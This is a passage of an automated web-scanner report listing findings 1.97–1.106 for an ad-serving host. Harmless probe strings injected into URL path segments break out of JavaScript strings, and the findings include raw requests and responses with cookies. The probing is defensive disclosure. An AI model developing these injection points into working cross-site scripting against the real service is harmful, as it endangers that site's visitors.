if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = z
...[SNIP]...
JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5295.Internet.com/B5200652.6;sz=300x250;click0=http://o1.qnsr.com//cgi/c%3Fa=20142454%3Bx=2305%3Bg=0,0%3Bc=203687985,203687985%3Bi=0%3Bn=203%3Bs=9542cee84';fb335840d2c%3B%3Bq=1%3Bk=' + zz_trd + ';ord=123456?">
...[SNIP]...

1.97. http://e2.cdn.qnsr.com//cgi/k/20142454/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20142454/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb585'%3bfb49cec39f9 was submitted in the REST URL parameter 4. This input was echoed as cb585';fb49cec39f9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20142454/2305cb585'%3bfb49cec39f9/0/0/203687985/203687985//0/203/9542//3000007/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1499
Cache-Control: max-age=2591972
Expires: Mon, 28 Mar 2011 01:49:03 GMT
Date: Sat, 26 Feb 2011 01:49:31 GMT
Connection: close


var zzADS_CHAN = '203687985';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = z
...[SNIP]...
<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5295.Internet.com/B5200652.6;sz=300x250;click0=http://o1.qnsr.com//cgi/c%3Fa=20142454%3Bx=2305cb585';fb49cec39f9%3Bg=0,0%3Bc=203687985,203687985%3Bi=0%3Bn=203%3Bs=9542%3B%3Bq=1%3Bk=' + zz_trd + ';ord=123456?">
...[SNIP]...

1.98. http://e2.cdn.qnsr.com//cgi/k/20142454/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20142454/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c0efa'%3be267596c3ab was submitted in the REST URL parameter 5. This input was echoed as c0efa';e267596c3ab in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20142454/2305/0c0efa'%3be267596c3ab/0/203687985/203687985//0/203/9542//3000007/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1499
Cache-Control: max-age=2591949
Expires: Mon, 28 Mar 2011 01:48:44 GMT
Date: Sat, 26 Feb 2011 01:49:35 GMT
Connection: close


var zzADS_CHAN = '203687985';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = z
...[SNIP]...
<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5295.Internet.com/B5200652.6;sz=300x250;click0=http://o1.qnsr.com//cgi/c%3Fa=20142454%3Bx=2305%3Bg=0c0efa';e267596c3ab,0%3Bc=203687985,203687985%3Bi=0%3Bn=203%3Bs=9542%3B%3Bq=1%3Bk=' + zz_trd + ';ord=123456?">
...[SNIP]...

1.99. http://e2.cdn.qnsr.com//cgi/k/20142454/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20142454/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7e74a'%3bbdfb1e10276 was submitted in the REST URL parameter 6. This input was echoed as 7e74a';bdfb1e10276 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20142454/2305/0/07e74a'%3bbdfb1e10276/203687985/203687985//0/203/9542//3000007/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1499
Cache-Control: max-age=2591985
Expires: Mon, 28 Mar 2011 01:49:23 GMT
Date: Sat, 26 Feb 2011 01:49:38 GMT
Connection: close


var zzADS_CHAN = '203687985';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = z
...[SNIP]...
<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5295.Internet.com/B5200652.6;sz=300x250;click0=http://o1.qnsr.com//cgi/c%3Fa=20142454%3Bx=2305%3Bg=0,07e74a';bdfb1e10276%3Bc=203687985,203687985%3Bi=0%3Bn=203%3Bs=9542%3B%3Bq=1%3Bk=' + zz_trd + ';ord=123456?">
...[SNIP]...

1.100. http://e2.cdn.qnsr.com//cgi/k/20142454/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20142454/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d3891'%3ba2a152fce1c was submitted in the REST URL parameter 7. This input was echoed as d3891';a2a152fce1c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20142454/2305/0/0/203687985d3891'%3ba2a152fce1c/203687985//0/203/9542//3000007/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1517
Cache-Control: max-age=2592000
Expires: Mon, 28 Mar 2011 01:49:41 GMT
Date: Sat, 26 Feb 2011 01:49:41 GMT
Connection: close


var zzADS_CHAN = '203687985d3891';a2a152fce1c';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = zzPage_obj[zzADS_CHAN].zzTrd;

...[SNIP]...

1.101. http://e2.cdn.qnsr.com//cgi/k/20142454/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js [REST URL parameter 8]

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20142454/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js

Issue detail

The value of REST URL parameter 8 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a25ba'%3bfe48c25a940 was submitted in the REST URL parameter 8. This input was echoed as a25ba';fe48c25a940 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20142454/2305/0/0/203687985/203687985a25ba'%3bfe48c25a940//0/203/9542//3000007/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1499
Cache-Control: max-age=2592000
Expires: Mon, 28 Mar 2011 01:49:44 GMT
Date: Sat, 26 Feb 2011 01:49:44 GMT
Connection: close


var zzADS_CHAN = '203687985';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = z
...[SNIP]...
<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5295.Internet.com/B5200652.6;sz=300x250;click0=http://o1.qnsr.com//cgi/c%3Fa=20142454%3Bx=2305%3Bg=0,0%3Bc=203687985,203687985a25ba';fe48c25a940%3Bi=0%3Bn=203%3Bs=9542%3B%3Bq=1%3Bk=' + zz_trd + ';ord=123456?">
...[SNIP]...

1.102. http://e2.cdn.qnsr.com//cgi/k/20142454/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20142454/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js

Issue detail

The value of REST URL parameter 9 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f04ab'%3b12625b2384 was submitted in the REST URL parameter 9. This input was echoed as f04ab';12625b2384 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20142454/2305/0/0/203687985/203687985//0f04ab'%3b12625b2384/203/9542//3000007/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1498
Cache-Control: max-age=2592000
Expires: Mon, 28 Mar 2011 01:49:47 GMT
Date: Sat, 26 Feb 2011 01:49:47 GMT
Connection: close


var zzADS_CHAN = '203687985';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = z
...[SNIP]...
CRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5295.Internet.com/B5200652.6;sz=300x250;click0=http://o1.qnsr.com//cgi/c%3Fa=20142454%3Bx=2305%3Bg=0,0%3Bc=203687985,203687985%3Bi=0f04ab';12625b2384%3Bn=203%3Bs=9542%3B%3Bq=1%3Bk=' + zz_trd + ';ord=123456?">
...[SNIP]...

1.103. http://e2.cdn.qnsr.com//cgi/k/20142921/15105/0/0/203687990/203687990//0/203/9542//1000003/i.js [REST URL parameter 10]

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20142921/15105/0/0/203687990/203687990//0/203/9542//1000003/i.js

Issue detail

The value of REST URL parameter 10 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 46e63'%3bd4fe3ee258f was submitted in the REST URL parameter 10. This input was echoed as 46e63';d4fe3ee258f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20142921/15105/0/0/203687990/203687990//0/20346e63'%3bd4fe3ee258f/9542//1000003/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1711
Cache-Control: max-age=2591995
Expires: Mon, 28 Mar 2011 01:49:43 GMT
Date: Sat, 26 Feb 2011 01:49:48 GMT
Connection: close


var zzADS_CHAN = '203687990';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = z
...[SNIP]...
<a href="http://o1.qnsr.com//cgi/c?a=20142921;x=15105;c=203687990,203687990;i=0;n=20346e63';d4fe3ee258f;s=9542;q=1;' + zz_param + zz_ref + zzStr + ';k=' + zz_trd + 'http://altfarm.mediaplex.com/ad/ck/12309-121202-25586-3?mpt=%r">
...[SNIP]...

1.104. http://e2.cdn.qnsr.com//cgi/k/20142921/15105/0/0/203687990/203687990//0/203/9542//1000003/i.js [REST URL parameter 11]

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20142921/15105/0/0/203687990/203687990//0/203/9542//1000003/i.js

Issue detail

The value of REST URL parameter 11 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 83ba7'%3bd9c36cdc5fd was submitted in the REST URL parameter 11. This input was echoed as 83ba7';d9c36cdc5fd in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20142921/15105/0/0/203687990/203687990//0/203/954283ba7'%3bd9c36cdc5fd//1000003/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1711
Cache-Control: max-age=2592000
Expires: Mon, 28 Mar 2011 01:49:52 GMT
Date: Sat, 26 Feb 2011 01:49:52 GMT
Connection: close


var zzADS_CHAN = '203687990';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = z
...[SNIP]...
<a href="http://o1.qnsr.com//cgi/c?a=20142921;x=15105;c=203687990,203687990;i=0;n=203;s=954283ba7';d9c36cdc5fd;q=1;' + zz_param + zz_ref + zzStr + ';k=' + zz_trd + 'http://altfarm.mediaplex.com/ad/ck/12309-121202-25586-3?mpt=%r">
...[SNIP]...

1.105. http://e2.cdn.qnsr.com//cgi/k/20142921/15105/0/0/203687990/203687990//0/203/9542//1000003/i.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20142921/15105/0/0/203687990/203687990//0/203/9542//1000003/i.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 864ff'%3bc2f0de444d5 was submitted in the REST URL parameter 4. This input was echoed as 864ff';c2f0de444d5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20142921/15105864ff'%3bc2f0de444d5/0/0/203687990/203687990//0/203/9542//1000003/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1711
Cache-Control: max-age=2592000
Expires: Mon, 28 Mar 2011 01:49:32 GMT
Date: Sat, 26 Feb 2011 01:49:32 GMT
Connection: close


var zzADS_CHAN = '203687990';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = z
...[SNIP]...
<a href="http://o1.qnsr.com//cgi/c?a=20142921;x=15105864ff';c2f0de444d5;c=203687990,203687990;i=0;n=203;s=9542;q=1;' + zz_param + zz_ref + zzStr + ';k=' + zz_trd + 'http://altfarm.mediaplex.com/ad/ck/12309-121202-25586-3?mpt=%r">
...[SNIP]...

1.106. http://e2.cdn.qnsr.com//cgi/k/20142921/15105/0/0/203687990/203687990//0/203/9542//1000003/i.js [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20142921/15105/0/0/203687990/203687990//0/203/9542//1000003/i.js

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c00dc'%3bc26396354fa was submitted in the REST URL parameter 7. This input was echoed as c00dc';c26396354fa in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20142921/15105/0/0/203687990c00dc'%3bc26396354fa/203687990//0/203/9542//1000003/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1729
Cache-Control: max-age=2592000
Expires: Mon, 28 Mar 2011 01:49:39 GMT
Date: Sat, 26 Feb 2011 01:49:39 GMT
Connection: close


var zzADS_CHAN = '203687990c00dc';c26396354fa';
